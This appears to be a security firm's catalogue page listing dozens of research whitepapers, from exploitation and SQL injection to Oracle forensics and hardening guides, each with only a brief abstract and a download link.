When exploiting vulnerabilities in compiled software we are often constrained by the amount of data that can be used, therefore it is important that shellcode is as small as possible. In this paper the author will describe his attempt to write Win32 shellcode that is as small as possible, in…
Writing Secure ASP Scripts
This paper will address some of the common classes of coding error that can be encountered when auditing web applications running on the Active Server Pages (ASP) platform. Firstly the paper will provide a list of common coding problems to be discussed, followed by a discussion of the three main…
Windows 2000 Format String Vulnerabilities
This paper, by David Litchfield, will discuss String Vulnerabilities on the Windows 2000 Operating System. Download Whitepaper
The Pentesters Guide to Akamai
This paper summarises the findings of NCC Group’s research into Akamai and provides companies who wish to gain maximum security through their solutions advice on how to achieve this. Akamai allows organisations to improve performance and decrease the load on a web-based service through distributed networks of servers to perform…
Modelling Threat Actor Phishing Behaviour
Modelling Threat Actor Phishing Behaviour – “you’re only as strong as your weakest link!” This whitepaper focuses on the reconnaisance phase of a simulated attack. It will discuss how likely targets are identified within an organisation and why certain individuals are chosen. The reconnaisance phase will typically involve open source intelligence…
Research Insights Volume 7: Exploitation Advancements
Research Insights Volume 7: Exploitation Advancements In the next of the Research Insights series we have looked at the exploitation techniques used by cyber criminals in their attempt to gain access to your critical business information. As exploits become more sophisticated, attacks of the previous era are now no longer…
Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug on both 32-bit and 64-bit
tl;dr Earlier this year I worked on an exploit for an interesting use-after-free vulnerability in win32k.sys (CVE-2015-0057) and was able to develop a reliable exploit on both 32-bit and 64-bit, affecting XP through Windows 8.1 (with a few exceptions). This writeup describes in detail how I approached exploitation on both…
The Demise of Signature Based Antivirus
There has been some debate on the importance of antivirus software over the past few years. Some see antivirus as a way to satisfy risk controls and form part of an organisation’s information security strategy and insist on antivirus being installed on all an organisations machines. However this demand for antivirus has…
Stopping Automated Attack Tools
There are a huge number of automated attack tools available that can spider and mirror application content, extract confidential material, discover code injection flaws, fuzz application variables for exploitable overflows, scan for common files or vulnerable CGIs and generally attack or exploit web-based application flaws. These tools are very useful…
Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond
This white paper outlines a set of practical and pragmatic security considerations for organisations designing, developing and, testing Internet of things (IoT) devices and solutions. The purpose of this white paper is to provide practical advice for consideration as part of the product development lifecycle. While IoT products by their…
Security Best Practice: Host Naming & URL Conventions
This paper will demonstrate how through the implementation of a well thought-out hosting name and URL referencing convention can provide a sizable contribution to an organisations defence-in-depth posture. Host and URL naming conventions are an issue that is often overlooked by organisations when they are developing web applications, but poorly…
Securing PL/SQL Applications with DBMS_ASSERT
Over the past few years Oracle has fixed a large number of PL/SQL injection vulnerabilities in their database server product. To help combat this class of attack Oracle has introduced the DBMS_ASSERT PL/SQL package. As a security researcher, it is excellent to see Oracle finally making the right positive moves…
Second-Order Code Injection Attacks
A second-order code injection attack is the process where malicious code is injected into a web-based application and not immediately executed but is stored by the application to be retrieved, rendered and executed by the victim later. In this paper we will further explain second-order code injection attacks, providing examples…
Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013
Embedded systems have become a part of our day to day lives and examples of these can be seen everywhere from TVs to aircraft, printers to weapon control systems, but as a security researcher it is often difficult to know how to begin when testing one of these black boxes.…
Research Insights Volume 4 – Sector Focus: Maritime Sector
The fourth edition of our ‘Research Insights’ series delves into the risks faced in the Maritime Industry as a result of the increasingly connected world that we live in. Cyber security weaknesses in the maritime industry include insufficiently maintained and protected software, problems with legacy communication systems and the widespread…
Research Insights Volume 2 – Defensive Trends
This paper is the second in a series of Research Insights from our world class research team. It looks at some of the most recent trends in information security defence, such as, cloud computing, mobile apps, mobile devices and security information management systems. Download whitepaper The next in the series…
Research Insights Volume 1 – Sector Focus: Financial Services
This whitepaper forms the first in a series of research insights from NCC Group. It delves into the financial services sector to provide an overview of some of the threats the sector is currently facing. This is a series of papers from NCC Group, the next two papers in the…
Quantum Cryptography – A Study Into Present Technologies and Future Applications
The first quantum cryptographic exchange occurred in October 1989 at IBM’s Thomas J. Watson Research Centre near New York. Two computers called Alice and Bob successfully negotiated a completely secure channel of communication over a distance of 32 centimetres, making quantum cryptography a reality rather than just a theory. In…
Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
This whitepaper is about PCI DSS v3.0 Requirement 3.4 – the requirement to protect cardholder data on disk/at rest. There are a number of compliant options available, with varying levels of security in different scenarios. This document is intended as an analysis of the various compliant options such that the…
Preparing for Cyber Battleships – Electronic Chart Display and Information System Security
In an increasingly connected world, cyber security is more important than ever. NCC Group, one of the world’s leading cyber security research companies, regularly investigates the susceptibility of non-traditional systems to attack in order to help raise awareness of the risks to these systems. In this paper, we discuss the…
Passive Information Gathering – The Analysis of Leaked Network Security Information
Most organisations are aware of and are protecting themselves against the threat posed by an attacker gaining access to systems through the exploitation of security vulnerabilities within the organisation’s systems. However the potential threat that information unintentionally leaked and freely available over the internet can pose to an organisation. This…
Oracle Passwords and OraBrute
This paper will discuss the weakness of Oracle passwords and how they are implemented with reference to a number of current security issues. Lastly this paper will introduce a tool to exploit this weakness in Oracle’s most priviliged account. Download whitepaper
Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations
This paper is the final in a series of papers exploring Oracle forensics by David Litchfield. In this paper David will be examining the internals of the Oracle System Change Number (SCN) in 10g and show how it can be useful in forensic investigations. The paper will also show how orablock and…
Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin
This paper is the 6th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. This paper will look at the ways a forensics examiner can search for evidence of an attack in the places and technologies designed by Oracle for disaster recovery processes. Download whitepaper
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing
This paper is the 5th in a series of papers by David Litchfield exploring the topic of Oracle Forensics, in this installment David will be discussing forensic analysis of a compromised database server. When investigating other areas of computer forensics it is often obvious that a crime has been committed however…
Oracle Forensics Part 4: Live Response
This papers is the 4th in a series of papers covering Oracle forensics, in this paper David Litchfield will cover reactions to a security incident occurring. For many organisations without a plan of action in the event of a security incident the instinctive response is to disconnect the system from the network…
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism
This paper is the 3rd in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment David will be looking at ways to understand if a breach has been successful. The paper will start by exploring attacks against the authentication mechanism and evidence from the…
Oracle Forensics Part 2: Locating Dropped Objects
This second paper in the Oracle Forensics series will show, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around” which can be sewn together to build an accurate picture of what the actions the…
Oracle Forensics Part 1: Dissecting the Redo Logs
This paper is the 1st in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this 1st paper David will explain how the redo logs can be a rich source of evidence for a forensic examiner when they are investigating a compromised Oracle database server. Whenever a…
Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP
As the number of products providing protection against buffer overflow exploits on the stack, non-stack based over flow exploit will become more and more common. In this paper we will start by explaining the differences between a stack-based overflow and a non-stack based overflow, then explain how to write a…
New Attack Vectors and a Vulnerability Dissection of MS03-007
On the 17th of March 2003 Microsoft announced a patch to fix a security vulnerability at the centre of the Windows 2000 operating system. In this paper we will discuss a number of new attack vectors that we have discovered on the same operating system, including java based web servers…
More Advanced SQL Injection
This paper covers topics from the author’s previous paper “Advanced SQL Injection”, expanding upon and clarifying ideas from the previous paper. It will describe a method for privilege escalation using the openrowset function to scan a network, a method for extracting information in the absence of an error message and…
Microsoft’s SQL Server vs. Oracle’s RDBMS
This paper will be exploring the security postures of Microsoft’s SQL Server and Oracles RDBMS and examining the differences between the two systems based upon flaws reported by external security researchers. Download whitepaper
Microsoft SQL Server Passwords
It is widely know that an SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user’s password, which is stored in the sysxlogins table of the master database. However what has not been discussed are the details of the pwdencrypt() Function. This paper will cover the pwdencrypt function…
Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
Due to their relatively low cost, small size and easy of distribution smart cards have become a popular choice for security when designing a system. They are often regarded as tamper proof devices where data can be physically protected, but this is not the case and it should be remembered…
Lessons learned from 50 bugs: Common USB driver vulnerabilities
Over the past few years NCC Group has identified over 50 USB driver bugs, using this research along with information from his 2011 paper “USB – Undermining Security Barriers” Andy Davis will, in this paper, outline common USB vulnerabilities and how to identify them. The paper will firstly discuss the…
Inter-Protocol Exploitation
Inter-Protocol exploration is an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a different application which uses a different protocol entirely. This paper will expand upon previous research into Inter-Protocol Exploitation and will show the…
Inter-Protocol Communication
Research into web browser security has acted as a catalyst for more depth research into Inter-Protocol Communication, an attack vector that potentially allows arbitrary protocols to meaningful interact with each other. In the past, it has been assumed that communication between different protocols is invalid and of no consequence, this paper will…
Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities
Over the past few years there has been a shift in the pattern of security vulnerabilities and increase in the volume of zero-day (0day) exploits which is making traditional security strategies less effective. Although traditional techniques such as penetration testing and vulnerability scanning are still an essential part of a company’s security…
Implementing and Detecting a PCI Rootkit
This paper will build upon the author’s previous research presented in February 2006 that explored a way of persisting a rootkit in the system BIOS via the Advanced Configuration and Power Interface (ACPI). This paper will discuss means of persisting a rootkit on a PCI device containing a flashable expansion…
How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit
Penetration test reports commonly contain mention of vulnerabilities in SSL/TLS (hereafter referred to as just SSL). In many cases, this is due to system administrators not understanding the details of these services’ configuration and assuming that simply using SSL provides security. The issues identified during penetration tests are usually low…
Hackproofing Oracle Application Server
Although Oracle 9 was proven not to be Unbreakable as their marketing campaign claimed, the product had passed fourteen independent security evaluations, demonstrating Oracles commitment to producing a secure product. In this paper we aim to bring Oracle customers to the secure environment they were promised by examining the ways…
Hackproofing MySQL
MySQL is one of the most popular open source databases, and compared to some database management systems it is relatively easy to configure. However there are still a wide variety of configuration issues that need to be addressed to ensure the system is secure. This paper will provide an outline…
Hackproofing Lotus Domino Web Server
This paper will show Lotus Domino administrators ways in which an attacker would attempt to subvert the security of a Domino web server and provide insight into the mind of a Domino hacker. Throughout the paper the attacks will be explained in detail and will include information on how to…
Hacking Appliances: Ironic exploits in security products
The paper will review research in 2012 conducted into the overall security posture of popular appliance-based security products, building on research carried out in 2011 by NCC Group. The research focused on the most recent versions of widely used appliances from popular vendors in the IT Security industry covering: Firewalls…
Fuzzing USB devices using Frisbee Lite
This paper will discuss the format of device requests that are sent to USB devices in order to hopefully provide an insight into areas where software flaws may exist. It will also discuss a number of public vulnerabilities in USB devices and finally, the installation and usage of Frisbee Lite.…
HDMI – Hacking Displays Made Interesting
Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…
Exploiting Security Gateways Via Web Interfaces
The security of security software is often taken for granted, and people assume that as it has been developed by a company that knows security it is likely to be secure. However with regards to Security Gateway UIs this is an incorrect assumption, the developers who design code and test the UI…
Research Insights Volume 5 – Sector Focus: Automotive
The modern vehicle has become increasingly computerised, and with that have come increased risk of cyber threats. While it has been known for some time in the vehicle modification and security industries that electronic vehicle systems contain exploitable vulnerabilities, it is only recently that academics, government, vehicle manufacturers, and the cyber security research community…
The why behind web application penetration test prerequisites
The why behind web application penetration test prerequisites Before a web application penetration test is scheduled to start, the company performing the test will contact the client with a set of prerequisites; that is, a list of considerations and configurations that are required before the test can begin. However, the…
Blackbox iOS App Assessments Using idb
Blackbox iOS App Assessments Using idb Daniel Mayer Presented at Black Hat Mobile Security Summit, 2015 Abstract More than ever, mobile apps are used to manage and store sensitive data by both corporations and individuals. In this paper, we review common iOS mobile app flaws involving data storage, inter-process communication,…
Cyber red-teaming business-critical systems while managing operational risk
Cyber red-teaming business-critical systems while managing operational risk Cyber red-teaming allows mature organisations to gauge their true resilience to sophisticated, planned, and somewhat sustained cyber-attack. These organisations use red team engagements to assess multiple facets of their cyber security strategy, maturity and implementation. With the introduction of programmes such as…
Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
In this paper, Daniel Mayer and Drew Suarez discuss the challenges mobile app developers face in securing data stored on devices including mobility, accessibility, and usability requirements. Given these challenges, we first debunk common misconceptions about full-disk encryption and show why it is not sufficient for many attack scenarios. We then systematically introduce the more…
USB attacks need physical access right? Not any more…
Historically USB bugs have required physical access so that a rogue device can be inserted into the target system to trigger a vulnerability by supplying malicious data, often within a USB protocol descriptor. This paper provides step-by-step instructions, showing how to remotely trigger a Windows-based USB bug by using a…
Threat Profiling Microsoft SQL Server
In this paper we will write from the perspective of an attacker targeting the Microsoft SQL Server. The paper will cover: Setting up for an attack Attacks that do not require authentication Attacks that require authentication
Thin Clients: Slim Security
The advent of thin client, diskless PCs appear to offer IT Managers a cheap and effective solution to the problem of managing a large estate of desktop PCs and the associated security risks, making thin clients an attractive solution. However research for this paper has revealed that these devices can…
The Phishing Guide: Understanding & Preventing Phishing Attacks
Phishing started off being part of popular hacking culture, but quickly professional criminals began using phishing techniques to steal personal finances and conduct identity theft at a global level. As phishing attacks become more widespread and more sophisticated it is important that we understand the tools and techniques used. This…
Bypassing Oracle DBMS_ASSERT (in certain situations)
Oracle Security Specialist, Alex Kornbrust, demonstrated that there are certain cases where the use of the DBMS_ASSERT.QUALIFIED_SQL_NAME function can be unintentionally misused by developers so that SQL injection is still possible and showing a way to break out of a quoted string to inject arbitrary SQL. This paper will explore another…
Assuring Your DDoS Defences
Distributed Denial of Service (DDoS) attacks first appeared on the internet in 2000, since then they have increased in frequency and size and become a serious threat to an organisation’s security. During a DDoS attack thousands of botnets will flood an organisation’s servers with more requests than they can handle,…
Black Hat Europe 2013 Andy Davis: To dock or not to dock…
This paper will explore the issue of laptop docking stations being used as attack platforms as well as explaining a few simple techniques that can be used to mitigate the risks. Laptop docking stations are attractive to organisations with semi-mobile workers as they enable users to connect their laptops to…
BlackBerry PlayBook Security – Part Two – BlackBerry Bridge
This paper is the second in a series discussing the security of the Blackberry PlayBook, and will focus on the security of the Blackberry Bridge. The Blackberry Bridge allows its users to connect their Playbook to the Blackberry phone and use applications on the tablet through the phone and for…
BlackBerry PlayBook Security – Part One
This paper forms the first in a series of papers on the security of the first tablet devices from Research in Motion (RIM), the Blackberry PlayBook. This paper aims to give an overview of the security of the Blackberry PlayBook, a breadth first approach was taken to uncover as many…
Automated enumeration of email filtering solutions
This whitepaper summarises research undertaken in 2013/14 to develop offensive reconnaissance techniques for automated and external enumeration of the email filtering solutions of target organisations. It show how methodology, automated scripts, and test message sets can be used to enumerate a target email filtering solution, quickly and to a high…
Attacking the Windows Kernel (Black Hat Las Vegas 2007)
This paper is focused on Windows and the Intel Architecture, and will briefly outline the current supervisor boundaries provided. Different attack vectors, along with relevant examples, will be provided to demonstrate how to attack the supervisor from the perspective of the supervised. Download whitepaper
Assessing IIS Configuration Remotely
A good application security assessment should probe all levels of the environment as well as the custom application itself. In this paper we will examine the relatively unknown skills of assessing the in-depth configuration of a Microsoft IIS web server remotely, and we hope that we will also show the…
A Simple and Practical Approach to Input Validation
Input validation is the process of ensuring the input into software conforms to what the internal logic of the software expects, though it is a relatively simple problem to solve it accounts for a high proportion of security vulnerabilities discovered. Not only is more education needed on the security risks…
Application Layer Attacks – The New DDoS Battleground
DDoS attacks have been on the up for a number of years which has resulted in significant increases in the variety and availability of mitigation services designed to deal with such threats. With advancements in attack techniques comes the requirement for mitigation providers to adapt detection and scrubbing methodologies. We…
Anti Brute Force Resource Metering
Web-based applications’ authentication processes are commonly vulnerable to automated brute force guessing attacks. Techniques such as escalating time delays and minimum lockout strategies are commonly implemented to solve the problem however in reality these techniques are not effective. This paper will explore an alternative solution, the enforcement of resource metering…
An Introduction to Heap overflows on AIX 5.3L
This paper, by David Litchfield, will be exploring the introduction to heap overflows on AIX 5.3L. Download whitepaper